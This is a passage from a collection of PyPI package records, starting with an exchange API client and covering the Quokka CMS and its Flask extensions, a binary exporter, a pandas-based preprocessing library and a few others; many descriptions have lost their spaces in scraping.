for\nliquid(quoinex) apiInstallation$ pip install quoinex-clientUsage## sync#fromquoinex_client.syncimportClientclient=Client(public_key='your api key',private_key='your api secret')response=client.get_products()print(response.status_code,response.json())## async#importgrequestsfromquoinex_client.asyncimportAsyncclient=Async(public_key='your api key',private_key='your api secret')reqs=[client.get_products(),client.get_product(id=1),...]response=grequests.map(reqs)forrinresponse:print(r.status_code,r.json())client.get_products()# GET /productsclient.get_product(id=1)# GET /products/:idclient.get_order_book(id=1)# GET /products/:id/price_levelsclient.get_executions(product_id=1)# GET /executions?product_id=1&limit=2&page=2client.get_executions(currency_pair_code='BTCJPY',timestamp=1526012797)# GET /executions?product_id=1×tamp=1430630863&limit=2client.get_interest_rate_ladder(currency='USD')# GET /ir_ladders/USDclient.create_order(order_type='limit',product_id=1,side='sell',quantity=0.01,price=500.0)# POST /ordersclient.get_order(id=1)# GET /orders/:idclient.get_orders()# GET /orders?funding_currency=:currency&product_id=:product_id&status=:status&with_details=1client.cancel_order(id=1)# PUT /orders/:id/cancelclient.edit_live_order(id=1)# PUT /orders/:idclient.get_order_trades(id=1)# GET /orders/:id/tradesclient.get_your_executions(product_id=1)# GET /executions/me?product_id=:product_idclient.get_fiat_accounts()# GET /fiat_accountsclient.create_fiat_account(currency='USD')# POST /fiat_accountsclient.get_crypto_accounts()# GET /crypto_accountsclient.get_account_balances()# GET /accounts/balanceclient.create_loan_bid(quantity=50,currency='USD',rate=0.0002)# POST /loan_bidsclient.get_loan_bids(currency='USD')# GET /loan_bids?currency=:currencyclient.close_loan_bid(id=1)# PUT /loan_bids/:id/closeclient.get_loans(currency='JPY')# GET /loans?currency=JPYclient.update_loan(id=1)# PUT /loans/144825client.get_trading_accounts()# GET /trading_accountsclient.get_trading_account(id=1)# GET /trading_accounts/:idclient.update_leverage_level(id=1)# PUT /trading_accounts/:idclient.get_trades()# GET /trades?funding_currency=:funding_currency&status=:statusclient.close_trade(id=1)# PUT /trades/:id/closeclient.close_all_trades()# PUT /trades/close_allclient.update_trade(id=1,stop_loss=300,take_profit=600)# PUT /trades/:idclient.get_trade_loans(id=1)# GET /trades/:id/loansContributingFork itCreate your feature branch (git checkout-bmy-new-feature)Commit your changes (git commit-am'Add some feature')Push to the branch (git push originmy-new-feature)Create new Pull Request"} +{"package": "quokka", "pacakge-description": "quokkaThe Happiest CMF in the worldQuokka is a Content Management Framework written in Python.A lightweight framework to build CMS (Content Management System) as\nwebsites, portals, blogs, applications and anything related to\npublishing content to the web.Quokka is not limited to CMS area, it is also possible to create Quokka\nextensions to provide any kind of web application based on Python and\nFlask.Quokka can also (optionally) generate a static website from the contents\ngenerated in its admin interface.FeaturesWeb based content management admin interfaceMultiple content formats (markdown, rst, html, plaintext)Compatibility with any of thePelican ThemesFlat file NoSQL databaseTinyDBor optionallyMongoDBfor\nscale deploymentsHost the Quokka server or generate a static websiteExtensible via modules/pluginsPowered by Python, Flask, Flask-Admin, TinyMongo and Pelican ThemesQuick StartInstall and run for development modegitclonehttps://github.com/rochacbruno/quokkacdquokkapython3-mvenvvenv.venv/bin/activatemakeinstallmakedevserverOr install quokka from PyPIpython3-mvenvvenv.venv/bin/activatepip3installquokkaNOTE:QuokkaCMSrequiresPython3.6+Start a project$quokkainitNewWebsite--theme=flex--modules=gitpages,heroku...\ud83d\udc39Quokkaprojectcreated\ud83d\udc39\ud83d\udcddName:NewWebsite\ud83d\udcc1Location:/tmp/newwebsite\ud83d\udcdaTemplate:default\ud83c\udfa8Themes:flexthemeinstalled\ud83d\ude9aModules:[gitpages,heroku]installed\ud83d\udd27Config:Configfilewrittenin/tmp/newwebsite/quokka.yml\u27a1Goto/tmp/newwebsite\u2699run`quokkarunserver`tostart!\ud83d\udcc4Checkthedocumentationonhttp://quokkaproject.org\ud83d\udc39HappyQuokka!\ud83d\udc39YES!itoutputsemojis\ud83d\udc39The above command will generate your project inmyprojectfolder as:.\u251c\u2500\u2500databases# TinyDB database files (gitignored)\u251c\u2500\u2500modules# Custom modules to load on EXTRA_EXTENSIONS\u251c\u2500\u2500static_build# output static site\u251c\u2500\u2500themes# Front-end Themes (Pelican and Quokka Themes supported)\u251c\u2500\u2500uploads# Media uploaded via admin\u251c\u2500\u2500.gitignore# gitignore to exclude sensitive files\u251c\u2500\u2500quokka.yml# Project settings\u251c\u2500\u2500.secrets.yml# To store keys, tokens and passwords (gitignored)\u2514\u2500\u2500wsgi.py# To deploy `gunicorn wsgi:app`You can optionally pass arguments:Choose existing theme (the default isMalt)quokkainitmywebsite--themehttp://github.com/user/themeInstall modulesquokkainitmywebsite--themehttp://github.com/user/theme--modules=\"commerce,foo\"theabovelooksfor``quokka_commerce``and``quokka_foo``inPyPIandinstallsitSet important configurationsquokkainitmywebsite--themehttp://github.com/user/theme--config=\"auth_enabled=false\"Thatisoptional,youhavetoedit``quokka.yml``totuneyoursettings.Run your websitequokkarunserver--port5000Access admin interfacehttp://localhost:5000/adminAccess your sitehttp://localhost:5000DeployYou can deploy your Quokka Website in a WSGI serverCheck thewsgi.pyand refer to it when deploying in wsgi servers.cdmyprojectgunicornwsgi:app-w4-b\"0.0.0.0:8000\"An example ofsupervisordconfig[program:quokka]command=/myproject/venv/bin/gunicorn wsgi:app -w 4 -b \"0.0.0.0:8000\"directory=/myprojectFor more information readGunicorn\ndocumentationPublish Static HTML websiteNOTE: To generate a static website all user management, keys and\npasswords will be removed from settings.You can generate a static HTML website to host anywhereOnce you have your website running locally you can easily generate a\nstatic HTML website from it.$quokkapublish--static[--outputpath]GeneratingstaticHTMLwebsiteon./static_buildfolderOnce you have a ./static_build folder populated with static website you\ncan deploy it using SCP, FTP or git, it is a full static website.Deploying to github pages from command lineNOTE: You need either ssh key access to github or it will ask\nlogin/passwordquokkapublish--static--git=rochacbruno/mysite--branch=gh_pagesTheaboveisalsoavailableinadminunder'publish'menu.Deploying via SCPquokkapublish--static--scp--dest='me@hostname:/var/www/mysite'[--sshkey~/.ssh/key][--passwordxyz]password:...Deploying to HerokuThis requiresherokuclient installed, ifProcfileis not\nfound it will be generatedquokkapublish--static--heroku--optionsDeploying via FTPquokkapublish--static--ftp--host='ftp://server.com'--dest='/var/www/mysite'Load database from remote deployment (only for TinyDB)When you publish a static website along with the static files the\ndatabase also goes to the server under the databases/ folder only as a\nbackup and snapshot.You can load that remote database locally e.g: to add new posts and then\nre-publishquokkarestoredb--remote--git=rochacbruno/mysiteCreatingabackupoflocaldatabase...DownloadingremotedatabaseRestoringdatabase..Done...Now you can runquokka runserveropen yourlocalhost:5000/adminwrite new content and thenPublishwebsite again using command line\nor admin interface.NOTE: If you want to restore a local database use--localand--pathpath/to/dbUsing MongoDBYou can choose to use MongoDB instead of TinyDB, That is useful\nspecially if you deploy or local instance has more than one admin user\nconcurrently and also useful if you want to install plugins which\nsupport MongoDB only (because it relies on aggregations and gridfs)You only need a running instance of Mongo server and changequokka.yml:DBon your project from:quokka:DB:system:tinydbfolder:databasesto:quokka:DB:system:mongodbname:my_databasehost:127.0.0.1port:2600Then when runningquokkaagain it will try to connect to that Mongo\nServer.With that you can deploy your site onwsgiserver or can also\ngeneratestaticwebsite.Running mongo in a Docker containercdyour_quokka_project_folderdockerrun-d-v$PWD/databases:/data/db-p27017:27017mongo# wait some seconds until mongo is startedquokkarunserverContributing to Quokka CMS DevelopmentDo you want to be part of this open-source project?Take a look atContributing GuidelinesSetup a contributor environmentEnsure you havePython3.6+clone this repo and:gitclonehttps://github.com/$YOURNAME/quokka_ngcdquokka_ng# create a Python3.6 virtual envmakecreate_env# activate the venv.venv/bin/activate# install Quokka in --editable mode (using flit)makeinstall# run quokkamakedevserverAccesshttp://localhost:5000/adminandhttp://localhostROADMAPThis list is available onhttps://github.com/rochacbruno/quokka_ng/issuesThis is the list of tasks to be completed until1.0.0can be\nreleased. support 100% coming only formaltandbootstrap3themes"} +{"package": "quokka-flask-admin", "pacakge-description": "Flask-AdminThe project was recently moved into its own organization. Please update your\nreferences togit@github.com:flask-admin/flask-admin.git.IntroductionFlask-Admin is a batteries-included, simple-to-useFlaskextension that lets you\nadd admin interfaces to Flask applications. It is inspired by thedjango-adminpackage, but implemented in such\na way that the developer has total control of the look, feel and functionality of the resulting application.Out-of-the-box, Flask-Admin plays nicely with various ORM\u2019s, includingSQLAlchemy,MongoEngine,pymongoandPeewee.It also boasts a simple file management interface and aredis clientconsole.The biggest feature of Flask-Admin is flexibility. It aims to provide a set of simple tools that can be used for\nbuilding admin interfaces of any complexity. So, to start off with you can create a very simple application in no time,\nwith auto-generated CRUD-views for each of your models. But then you can go further and customize those views & forms\nas the need arises.Flask-Admin is an active project, well-tested and production ready.ExamplesSeveral usage examples are included in the/examplesfolder. Please feel free to add your own examples, or improve\non some of the existing ones, and then submit them via GitHub as apull-request.You can see some of these examples in action athttp://examples.flask-admin.org.\nTo run the examples on your local environment, one at a time, do something like:cd flask-admin\npython examples/simple/app.pyDocumentationFlask-Admin is extensively documented, you can find all of the documentation athttps://flask-admin.readthedocs.io/en/latest/.The docs are auto-generated from the.rstfiles in the/docfolder. So if you come across any errors, or\nif you think of anything else that should be included, then please make the changes and submit them as apull-request.To build the docs in your local environment, from the project directory:pip install -r requirements-dev.txt\nsudo make htmlAnd if you want to preview any.rstsnippets that you may want to contribute, go tohttp://rst.ninjs.org/.InstallationTo install Flask-Admin, simply:pip install flask-adminOr alternatively, you can download the repository and install manually by doing:git clone git@github.com:flask-admin/flask-admin.git\ncd flask-admin\npython setup.py installTestsTest are run withnose. If you are not familiar with this package you can get some more info fromtheir website.To run the tests, from the project directory, simply:pip install -r requirements-dev.txt\nnosetestsYou should see output similar to:.............................................\n----------------------------------------------------------------------\nRan 102 tests in 13.132s\n\nOKFor all the tests to pass successfully, you\u2019ll need Postgres & MongoDB to be running locally. For Postgres:CREATE DATABASE flask_admin_test;\nCREATE EXTENSION postgis;3rd Party StuffFlask-Admin is built with the help ofBootstrapandSelect2.If you want to localize your application, install theFlask-BabelExpackage.You can help improve Flask-Admin\u2019s translations through Crowdin:https://crowdin.com/project/flask-adminChangelog1.4.2Small bug fix release. Fixes regression that prevented usage of \u201cvirtual\u201d columns with a custom formatter.1.4.1Official Python 3.5 supportCustomizable row actionsTablib support (exporting to XLS, XLSX, CSV, etc)Updated external dependencies (jQuery, x-editable, etc)Added settings that allows exceptions to be raised on view errorsBug fixes1.4.0Updated and reworked documentationFileAdmin went through minor refactoring and now supports remote file systems. Comes with the new, optional, AWS S3 file management interfaceConfigurable CSV export for model viewsAdded overridable URL generation logic. Allows using custom URLs with parameters for administrative viewsAdded column_display_actions to ModelView control visibility of the action column without overriding the templateAdded support for the latest MongoEngineNew SecureForm base class for easier CSRF validationLots of translation-related fixes and updated translationsBug fixes1.3.0New feature: Edit models in the list view in a popupNew feature: Read-only model details viewFixed XSS in column_editable_list valuesImproved navigation consistency in model create and edit viewsAbility to choose page size in model list viewUpdated client-side dependencies (jQuery, Select2, etc)Updated documentation and examplesUpdated translationsBug fixes"} +{"package": "quokka-flask-htmlbuilder", "pacakge-description": "===============================flask-htmlbuilder===============================.. image:: https://img.shields.io/travis/quokkaproject/flask-htmlbuilder.svg:target: https://travis-ci.org/quokkaproject/flask-htmlbuilder.. image:: https://img.shields.io/pypi/v/flask-htmlbuilder.svg:target: https://pypi.python.org/pypi/flask-htmlbuilderHTML builder for Python and FlaskFlask-HTMLBuilder~~~~~~~~~~~~~~~~~Flask-HTMLBuilder is a Flask extension that allows flexible and easyPython-only generation of HTML snippets and full HTML documents using arobust syntax. For more advanced usage it provides a lean templateinheritance system that is intertwined with the Flask/Werkzeug endpointmechanisms.Forked from: http://majorz.github.com/flask-htmlbuilder/"} +{"package": "quokka-flask-login", "pacakge-description": "Flask-Login-----------Flask-Login provides user session management for Flask. It handles thecommon tasks of logging in, logging out, and remembering your users'sessions over extended periods of time.Flask-Login is not bound to any particular database system or permissionsmodel. The only requirement is that your user objects implement a fewmethods, and that you provide a callback to the extension capable ofloading users from their ID.Links`````* `documentation `_* `development version`_"} +{"package": "quokka-flask-mongoengine", "pacakge-description": "Flask-MongoEngine--------------Flask support for MongoDB using MongoEngine.Includes `WTForms`_ support.Links`````* `development version`_"} +{"package": "quokka-flask-security", "pacakge-description": "Flask-Security quickly adds security features to your Flask application.ResourcesDocumentationIssue TrackerCodeDevelopment Version"} +{"package": "quokka-project", "pacakge-description": "Quokkaimage generated byDALL-ETable of ContentsIntroductionInstallationUsageBuildingDocumentationFAQIntroductionQuokka is a binary exporter: from the disassembly of a program, it generates\nan export file that can be used without the disassembler.The main objective ofQuokkais to enable to completely manipulate the\nbinary without ever opening a disassembler after the initial step. Moreover, it\nabstracts the disassembler's API to expose a clean interface to the users.Quokka is heavily inspired byBinExport,\nthe binary exporter used by BinDiff.InstallationPython pluginThe plugin is built in the CI and available in theregistry.It should be possible to install directly from PIP using this kind of commmand:$ pip install quokka-projectIDA PluginNote: The IDA plugin is not needed to read aQuokkagenerated file. It is\nonly used to generate them.Quokka is currently compatible with IDA 7.3+The plugin is built on the CI and available in theReleasetab.To download the plugin, get the file namedquokka_plugin**.so.UsageExport a file!!! noteThis requires a working IDA installation.Either using command line:$ idat64 -OQuokkaAuto:true -A /path/to/hello.i64Note: We are usingidat64and notida64to increase the export speed\nbecause we don't need the graphical interface.Using the plugin shortcut inside IDA: (by default) Alt+ALoad an export fileimportquokka# Directly from the binary (requires the IDA plugin to be installed)ls=quokka.Program.from_binary(\"/bin/ls\")# From the exported filels=quokka.Program(\"ls.quokka\",# the exported file\"/bin/ls\")# the original binaryBuildingBuilduser@host:~/quokka$cmake-Bbuild\\# Where to build-S . \\ # Where are the sources-DIdaSdk_ROOT_DIR:STRING=path/to/ida_sdk \\ # Path to IDA SDK-DCMAKE_BUILD_TYPE:STRING=Release \\ # Build Typeuser@host:~/quokka$cmake--buildbuild--targetquokka_plugin---jTo install the plugin:user@host:~/quokka$cmake--installbuildIn any case, the plugin will also be inbuild/quokka-install. You can\ncopy it to IDA's user plugin directory.user@host:~/quokka$cpbuild/quokka-install/quokka*64.so$HOME/.idapro/plugins/For more detailed information about building, seeBuildingDocumentationDocumentation is available online atdocumentationFAQYou can see a list of questions hereFAQ"} +{"package": "quokkas", "pacakge-description": "quokkasData analysis tool that you didn't know you needed.Quokkas is a powerful pandas-based data analysis tool. In addition to the well-known pandas functionality, it provides\ntools for data preprocessing, pipelining and explorative data analysis.Let's have a short overview of these three pillars.PreprocessingWith quokkas, it is incredibly easy to scale, impute, encode (incl. dates), normalize, trim, and winsorize your data.\nThese operations are not only easy to use - they are fast, robust and preserve your DataFrame structure / typing.For instance, if you wish to standardize your data, you can simply do it like that:import quokkas as qk\ndf = qk.read_csv('42.csv')\ndf = df.scale('standard') \n# or simply df.scale('standard', inplace=True)By default, each transformation has anauto=Trueparameter. This parameter ensures that the transformations are\napplied only to \"relevant\" columns. For instance, scale, normalize, winsorize and trim are applied only to numeric\ncolumns, encode is applied to columns with \"few\" distinct values, and impute is strategy- and type-dependent (see more\nin our preprocessing deep-dive).Additionally, by default the transformations do not include the target column(s) - which you can set viadf.targetize('target_column_name')ordf.targetize(['target_one_column_name, 'target_two_column_name']). You can\nchange that behaviour by settinginclude_target=True, like indf.impute('simple', strategy='default', include_target=True),However, the user is, of course, able to simply select the columns that they want to transform or ensure that some\ncolumns are not transformed:# only 'investor_type' and 'country_of_origin' will be ordinally encoded\ndf.encode(kind='ordinal', include=['investor_type', 'country_of_origin'], inplace=True) \n# the first argument is always 'kind', so we could also use df.encode('ordinal', ...)\n\n# all automatically selected columns except 'defcon_state' will be onehot-encoded\ndf.encode('onehot', exclude=['defcon_state'], inplace=True)\n\n# all columns in the dataframe except for 'familial_status' and 'accommodation' will be robustly scaled\ndf.scale('robust', auto=False, exclude=['familial_status', 'accommodation'], inplace=True)As you might have guessed, this column selection procedure is uniform across all data preprocessing functions. Some\npreprocessing functions have several (at times kind-dependent) additional parameters. For user convenience they are\nheavily aligned with sklearn preprocessing functionality.For instance,df.scale('standard')supports additional booleanwith_meanandwith_stdparameters,df.encode('onehot')supports additionalcategories,drop,sparse,dtype,handle_unknown,min_frequencyandmax_categoriesparameters, anddf.impute('simple')supportsstrategy,missing_valuesandfill_valueparameters which can be used just like you would use respective sklearn'sStandardScaler,OneHotEncoder, andSimpleImputerparameters.But how could you use the transformed data for, say, training a model? Of course, you could transfer the data to two\nnumpy arrays and go from there:y = df['target_name'].to_numpy()\nX = df.drop('target_name'], axis=1).to_numpy()\n\n# which is equivalent to:\nX, y = df.separate(to_numpy=True)\n# if 'target_name' was targetized\n\nmodel = GradientBoostingClassifier(loss='log_loss', learning_rate=5e-2)\nmodel.fit(X, y)However, quokkas provides an even easier way to fit a model to the dataframe. You just need to do the following:df.fit(GradientBoostingClassifier(loss='log_loss', learning_rate=5e-2))\n\n# now you can access the trained model via\nmodel = df.pipeline.model\n\n# and you can make predictions for the dataframe like that:\ny_pred = df.predict()\n\n# or, if you wanted to predict the values for another dataframe, you could use:\ny_pred = df_test.predict(df.pipeline.model)This example forces us to think about the following natural problem: sometimes we would like to transform a dataframe in\nexactly the same way as another dataframe. This is very easy in quokkas! Let's quickly learn how to do it:PipeliningBy default, quokkas pipelines (most of) the dataframe functions. That means that after each transformation, quokkas\nsaves the data needed to do exactly the same transform again - which can be used, for instance, on another dataframe.\nThis new dataframe can be changed viadf_new.stream(df_old)- which finds the first operation indf_oldthat wasn't\napplied todf_newand applies the rest of thedf_oldpipeline todf_new.Here is an example: say we have some data in a csv file, and we would like to load it, add a couple of columns,\npreprocess the data, fit a model, and evaluate the performance on the test dataset. Of course, we want to evaluate the\nperformance of the model in a clean way - in particular, we would like to fit all data preprocessors (e.g. scaler)\nsolely on the training data, without looking at the test data. Here is how we do it:# load data\ndf = qk.read_csv('data.csv')\n\n# create a couple of additional variables\ndf['sales_cash_ratio'] = df['sales'] / df['cash'] \ndf['return'] = df['price'].pct_change()\ndf['return_squared'] = df['return'] ** 2\n\n# we would like to predict the returns for the next period:\ndf['target_return'] = df['return'].shift(-1)\n\n# split the data into train and test sets - convenient functionality, btw!\n# default split is 80% train and 20% test\ndf_train, df_test = df.train_test_split(random_seed=42)\n\n# turn on the inplace mode (default inplace=False in all functions) - strictly speaking not necessary,\n# could achieve the same by writing inplace=True for each preprocessing function \nqk.Mode.inplace()\n# this can be undone with qk.Mode.outplace()\n\n# targetize the target_return column, impute the missing values for feature columns\n# and drop missing values for target - note that the impute function imputes missing values for all \n# columns except target, so the only missing values left after imputing will be in the target\ndf_train.targetize('target_return').impute().dropna()\n\n# scale the data robustly, winsorize the data and encode auto-detected values\n# and encode dates - note that scaling and winsorization (with default auto=True) \n# does not affect non-numeric columns\ndf_train.scale('robust').winsorize(limits=(0.005, 0.005)).encode('onehot', drop='first').encode_dates(intrayear=True)\n\n# fit the model\ndf_train.fit(RandomForestRegressor())\n\n# change df_test exactly like we changed df_train, but without refitting of scalers / encoders\n# in a scenario when you want to refit transformers on the new dataframe, you can set fit=True\n# by default, stream will also copy the df_train's model\ndf_test.stream(df_train.pipeline)\n# or, alternatively, df_test.stream(df_train)\n\n# make predictions\npreds = df_test.predict()\n\n# evaluate the results\n_, trues = df_test.separate()\nmse = np.mean((preds - trues)**2)So, quite easy indeed. Above we used thetrain_test_splitfunction to split the data into a training and a test set,\nbut what if we wanted to split data into multiple sets, e.g. for validation? For that we can use functionstrain_val_test_splitandsplit. Here are some examples:df = df.sample(10000)\n\n# default sizes for train_val_test_split are (0.8, 0.1, 0.1)\naccepts parameters train_size, val_size and test_size and can infer one of them if the others are specified\ndf_train, df_val, df_test = df.train_val_test_split(train_size=0.7, val_size=0.1)\n\n# the same result can be achieved with the split function\ndf_train, df_val, df_test = df.split(n_splits=3, sizes=(0.7, 0.1, 0.2))\n# equivalent to {n_splits=3, sizes=(7000, 1000, 2000)}, {sizes=(7000, 1000, 2000)}, {n_splits=3, sizes=(7000, 1000)}\n# since n_splits can be inferred from sizes and one remaining size can be inferred if n_splits is specified\n# if sizes are not specified at all, split function would split the data into n_splits approximately equal partsBy default, splitterkindis set toshuffled, other options includesequential(rows are not shuffled before\nsplit),stratified(preserves the same proportions of examples in each class of the provided column) andsorted(the\ndataframe is first sorted by a provided column, then a sequential split is performed). quokkas also offers a way to\nperform a k-fold split that is often used for cross-validation:df.targetize('target_return')\nmse = []\nfor df_train, df_test in df.kfold(kind='stratified', n_splits=3):\n df_train.scale('robust').winsorize(limits=(0.005, 0.005)).encode('onehot', drop='first').encode_dates(intrayear=True)\n df_train.fit(RandomForestRegressor())\n df_test.stream(df_train)\n preds = df_test.predict()\n trues = df_test.target\n mse.append(np.mean((preds - trues)**2))There is also a much easier way to perform cross-validation based on k-fold split in quokkas:def mse(y_true, y_pred):\n return np.mean((y_pred - y_true)**2)\nresult = df.cross_validate(estimator=RandomForestRegressor(), scoring=mse, cv=3, target='target_return')You can obtain the fitted models, training scores and predictions by settingreturn_estimator,return_train_scoreandreturn_predictionsparameters toTrue. The difference between the two approaches is that\nwhile using thecross_validatefunction is easier, it doesn't allow us to specify transformations to be performed on\nthe training and test data before fitting the model or making predictions - meaning it is still useful in most cases.Back to pipelining! Could we transform a completely new dataframe (say, some unlabeled data) in exactly the same way?\nWell, almost. As mentioned before, quokkas pipelines most of the dataframe operations. However, it does not keep track\nof column operations, or operations that involve other dataframes. How could we manage that?Well, nothing is easier! Quokkasdf.map()method allows us to pipeline any function that we might want to apply to a\ndataframe. We could use it like that:def add_columns(df):\n df['sales_cash_ratio'] = df['sales'] / df['cash'] \n df['return'] = df['price'].pct_change()\n df['return_squared'] = df['return'] ** 2\n df['target_return'] = df['return'].shift(-1)\n return df # it is critical to return the dataframe in a function that will be \"mapped\"\n\ndf.map(add_columns)\ndf.targetize('target_return').scale('robust').encode('onehot', drop='first')\n\ndf_new = qk.read_csv('test_data.csv')\n\n# stream all the changes - now with the pipelined column operations!\ndf_new.stream(df)\npreds = df_new.predict()A trained pipeline of a dataframe can be easily saved (as long as all transformations in it can be pickled). This is\nhow we can do that:# save\ndf.pipeline.save('path.pkl')\n\n# load\npipeline = qk.Pipeline.load('path.pkl')\n\n# visualize the pipeline\nprint(pipeline)\n\n# apply loaded pipeline to a new dataframe\ndf_new.stream(pipeline)As discussed above, all quokkas-native preprocessing functions (i.e. encode, scale, encode_dates, impute, winsorize,\ntrim) are saved in the pipeline, and an arbitrary function on a dataframe can be added to the pipeline via map. Most of\nthe dataframe's member functions that transform the dataframe in some way are also added to the pipeline (\"pipelined\")\nautomatically. Here is a list of the pipelined functions:df.abs() # this function got an additional inplace parameter compared to pd implementation\ndf.aggregate()\ndf.apply()\ndf.applymap()\ndf.asfreq()\ndf.astype()\ndf.bfill()\ndf.clip()\ndf.corr()\ndf.cov()\ndf.diff()\ndf.drop_duplicates()\ndf.drop()\ndf.droplevel()\ndf.dropna()\ndf.explode()\ndf.ffill()\ndf.fillna()\ndf.filter()\ndf.interpolate()\ndf.melt()\ndf.pipe()\ndf.pivot()\ndf.query()\ndf.rename_axis()\ndf.rename()\ndf.reorder_levels()\ndf.replace()\ndf.reset_index()\ndf.round()\ndf.select_dtypes()\ndf.shift()\ndf.sort_index()\ndf.sort_values()\ndf.stack()\ndf.swapaxes()\ndf.swaplevel()\ndf.targetize()\ndf.to_datetime() # similar in functionality to pd.to_datetime), but the user provides column labels instead of dataframe\ndf.to_period()\ndf.to_timestamp()\ndf.transform()\ndf.transpose()\ndf.unstack()The following member functions preserve the pipeline without adding themselves to it:df.align()\ndf.append()\ndf.asof()\ndf.combine()\ndf.combine_first()\ndf.corrwith()\ndf.dot()\ndf.get()\ndf.iloc[]\ndf.join()\ndf.loc[]\ndf.mask()\ndf.merge()\ndf.reindex()\ndf.sample()\ndf.set_axis()\ndf.set_index()\ndf.update()\ndf.where()\ndf.__getitem__() # i.e. df[['column_one', 'column_two']] preserves pipelineAdditionally, all arithmetic operations preserve the pipeline of the left element. As you might have noted, all\noperations that require another dataframe / series to work are not pipelined. This ensures that the pipeline does not\nbecome too large. Of course, if the user wants to pipeline these operations, they can do it via map - as dicussed above.If the user does not wish to pipeline a certain operation, they could turn a pipeline of the dataframe off. There are\ntwo principal ways to do that:# disable the pipeline\ndf.pipeline.disable()\n\ndf.abs(inplace=True) # won't be pipelined\n\n# enable the pipeline\ndf.pipeline.enable()\ndf.abs(inplace=True) # will be pipelined\n\n# the pipeline can also be disabled via context manager:\nwith df.pipeline:\n df.abs(inplace=True) # will not be pipelinedEvery selection operation preserves the pipeline (provided that the result of the operation is a dataframe). In\nparticular, each timedf.iloc[]is called, the pipeline of the original dataframe is copied. This makes those\nselection operations a little bit slower. There is a solution for that: quokkas provides a functionality to completely\nlock all pipeline operations viaqk.Lock.global_lock()(which can be reversed withqk.Lock.global_unlock()). There\nis also a convenient context manager:with qk.Lock.lock():\n df = df.scale('minmax')encode('ordinal').encode_dates(intraweek=True) # none of the operations will be pipelinedNote the difference: disabling the pipeline prevents transformations from being added to the pipeline, while the global\nlock prevents any operation on the pipeline. In particular, even when using operations that would generally preserve the\npipeline, with a global lock the pipeline might not be preserved!Now that we have discussed how the pipelining works for quokkas dataframes, we can move to the last important feature of\nthis package:Exploratory Data AnalysisQuokkas provides some very useful (in our unbiased opinion) capabilities to help the user understand the data better.\nSome provided functions are fairly standard:\nfor instance, the user can visualize the correlation matrix, create scatter plots for features / target variable\n(recommended if the target values are continuous), create density plots of features for each distinct value of the\ntarget variable as well as plot missing values for all features (and, if necessary, target). Here is an example of the\ninterface:# correlation plot\ndf.plot_correlation(auto=True, include_target=False, absolute=True, style='seaborn')\n\n# scatter plot, n_line_items corresponds to the number of plots in one line\ndf.plot_scatter(include=['col_1', 'col_2', 'col_3', 'col_4'], auto=False, n_line_items=2)\n\n# density plot (kde)\ndf.plot_density(auto=True, n_line_items=3)\n\n# missing values plot, reverse=False means that the shares of missing values will be plotted\n# otherwise, shares of present values would be plotted instead\ndf.plot_missing_values(reverse=False, figsize=(12, 5))Of course, the target for scatter and density plots should be provided to the dataframe via the targetize member\nfunction. An attentive reader might guess that the 'include' / 'exclude' / 'auto' logic here is the same as for the\npreprocessing functionality. By default, 'auto' is enabled, so in most cases the user does not need to provide any\narguments at all. Every charting function in quokkas allows the user to choose the style of the chart (string\ncorresponding to one of the plt.styles via style argument) and the figure size (via figsize argument).Additionally, quokkas provides a bit of non-standard charting functionality: the user may wish to view how the feature\nvalues depend on the values of the target. The functiondf.plot_feature_means()does exactly that. If the target\nvariable is continuous, the user may provide an integer 'buckets' argument - the target variable values will be split\nin that many quantiles and the mean of each variable will be plotted for each of the quantiles. In the case when the\ntarget variable is categorical, the means of feature values will be plotted for each distinct value of target variable.The user can specify if the target variable should be considered continuous or categorical via 'kind' argument: e.g.df.plot_feature_means(kind='categorical')ordf.plot_feature_means(kind='continuous'). By default, the kind\nparameter is set to 'default', which means that quokkas will attempt to infer the type of the target variable itself.This plot can be quantified in a simple way as well - for that, the user can use thedf.feature_importance()function.\nThis function calculates the variance of the means of the standardized feature values among different buckets / distinct\nvalues, corrects that variance with the expected variance of the means of the buckets / distinct values and returns the\nshare of this corrected variance for each feature.The last EDA function that we will cover is very simple:df.suggest_categorical(strategy=...)suggests the features\nthat should be considered categorical. It has the following strategies: 'count', 'type' and 'count&type'. If 'count' is\nselected, the decision will be based on the number of distinct feature values (if there are fewer than min(cat_number,\ncat_share*n_rows), the feature will be considered categorical, where cat_number and cat_share are parameters with\ndefault values 20 and 0.1). If 'type' is selected, the categorical features will be selected based on column type, and\nif 'count&type' is selected, all columns that would be selected under 'type' and 'count' strategies would be selected.We hope that you have a lot of fun working with quokkas! If you have any issues or suggestions - please feel free to\ncontact us! We will do our best to help!"} +{"package": "quokka-sharp", "pacakge-description": "Quokka Sharp for simulating and equivalence checking\nof quantum circuits based on weighted model counting.\nYou have to intall a weighted model counting tool first."} +{"package": "quokka-speaklater", "pacakge-description": "A module that provides lazy strings for translations. Basically you\nget an object that appears to be a string but changes the value every\ntime the value is evaluated based on a callable you provide.For example you can have a globallazy_gettextfunction that returns\na lazy string with the value of the current set language.Example:>>> from speaklater import make_lazy_string\n>>> sval = u'Hello World'\n>>> string = make_lazy_string(lambda: sval)This lazy string will evaluate to the value of thesvalvariable.>>> string\nlu'Hello World'\n>>> unicode(string)\nu'Hello World'\n>>> string.upper()\nu'HELLO WORLD'If you change the value, the lazy string will change as well:>>> sval = u'Hallo Welt'\n>>> string.upper()\nu'HALLO WELT'This is especially handy when combined with a thread local and gettext\ntranslations or dicts of translatable strings:>>> from speaklater import make_lazy_gettext\n>>> from threading import local\n>>> l = local()\n>>> l.translations = {u'Yes': 'Ja'}\n>>> lazy_gettext = make_lazy_gettext(lambda: l.translations.get)\n>>> yes = lazy_gettext(u'Yes')\n>>> print yes\nJa\n>>> l.translations[u'Yes'] = u'Si'\n>>> print yes\nSiLazy strings are no real strings so if you pass this sort of string to\na function that performs an instance check, it will fail. In that case\nyou have to explicitly convert it withunicodeand/orstringdepending\non what string type the lazy string encapsulates.To check if a string is lazy, you can use theis_lazy_stringfunction:>>> from speaklater import is_lazy_string\n>>> is_lazy_string(u'yes')\nFalse\n>>> is_lazy_string(yes)\nTrueNew in version 1.2: It\u2019s now also possible to pass keyword arguments to\nthe callback used withmake_lazy_string."} +{"package": "quokka-twill", "pacakge-description": "A scripting system for automating Web browsing. Useful for testing\nWeb pages or grabbing data from password-protected sites automatically."} +{"package": "quokka-web", "pacakge-description": "Quokka - Browser Automation Library with PlaywrightQuokka is a powerful Python library built on top of Playwright, designed to simplify browser automation and manipulation tasks. It provides a convenient facade for various browser interactions, making it easier to navigate web pages, extract data, and interact with page elements.Key FeaturesAsynchronous and Parallel Execution:Quokka operates entirely in an asynchronous manner. 